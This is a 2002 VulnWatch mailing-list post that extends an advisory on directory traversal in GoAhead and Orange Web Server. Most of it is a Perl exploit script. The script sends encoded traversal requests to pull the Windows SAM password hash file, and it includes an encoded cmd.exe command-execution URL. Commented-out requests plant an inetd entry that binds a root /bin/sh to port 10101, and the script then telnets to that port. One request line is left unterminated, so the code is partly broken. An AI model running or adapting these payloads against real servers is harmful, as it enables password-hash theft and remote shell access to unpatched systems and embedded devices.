Re:[VulnWatch] wp-02-0001: GoAhead Web Server Directory Traversal + Cross Site Scripting

From: xile@hushmail.com
Date: 07/17/02


From: xile@hushmail.com
To: vulnwatch@vulnwatch.org
Date: Wed, 17 Jul 2002 08:17:22 -0700


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Have been aware for some time and I Just wanted to add a little to

Mr. Moore's observations ;

Title: GoAhead Web Server Directory Traversal + Cross Site Scripting

>Also Effected: Orange Web Server -all versions

Risk Rating: Medium

>escalated to risk: high - password hash pilfer via 300 year old

>traversal technique

Software: GoAhead Web Server v2.1
<added Orange Web Server - All
<Orange Web Server uses GoAhead WebServer 2.1 technology so it is

<powerful and stable. - nuff said

Platforms: Windows NT/98/95/CE
            Embedded Linux
            Linux
            QNX
            Novell Netware + others

<ADDED: Hard Hat Linux - started
<bundling GoAhead with thier distros, so there should be palm

<pilots, cellphones and all kinds of nifty prototype devices

<running this sad-ware

#!/usr/bin/perl
# spawns a shell on port 10101
use IO::Socket;
if (@ARGV < 1) { print "usage: perl go-orange.pl [host]\n"; exit; }
$host = $ARGV[0];

$shell = IO::Socket::INET->new( PeerAddr=>"$host",
 PeerPort=>"80",
 Proto=>"tcp") || die "Connection failed.\n";

#dump sam is success on Orange and GoAhead!- was able to jump around

#and do interesting things with encoding 0-day
#%77innt/s%79s%74em%332/%63%6D%64.%65x%65?/c%25%32%30ech%6F%%320W%65

print $shell "GET /..%5C..%5C..%5C..%5C..%5C..%5C/winnt/repair/sam

##################################################################
#commented out hypothetical embedded webserver in transmeta-maytag

#stove scenario. Will leave hand held device ( game boy) format vuln

#testing to experts at Non-profit .org's
# Only testbeds I saw were win32 ( I only looked for 10 #minutes)

#print $shell "GET
#/..%5C..%5C..%5C..%5C..%5C..%5C/bin/echo%20\"10101%20stream%20tcp%2

#0nowait%20root%20/bin/sh%20-i\"%20>>%20/tmp/inet|
#HTTP/1.0\n\n";

# we get signal again
#$shell = IO::Socket::INET->new( PeerAddr=>"$host",
#PeerPort=>"80",
#Proto=>"tcp") || die "fuq, we no get signal.\n";

#print $shell "GET

#/..%5C..%5C..%5C..%5C..%5C..%5C/usr/sbin/inetd%20/tmp/inet|

#HTTP/1.0\n\n";

sleep 1;

print "handheld haqrz connect to $host on port 10101...";
system("telnet $host 10101");

- - xile
-----BEGIN PGP SIGNATURE-----
Version: Hush 2.1
Note: This signature can be verified at https://www.hushtools.com

wlkEARECABkFAj01ioASHHhpbGVAaHVzaG1haWwuY29tAAoJEBnsRZrmhGsJapUAnRCE
Mg4OfVISUBrPgWxFcbW2mK6XAJ4/xxmJInaJRv/YqC45ki6wYPOPbA==
=IKhW
-----END PGP SIGNATURE-----

Communicate in total privacy.
Get your free encrypted email at https://www.hushmail.com/?l=2

Looking for a good deal on a domain name? http://www.hush.com/partners/offers.cgi?id=domainpeople



Relevant Pages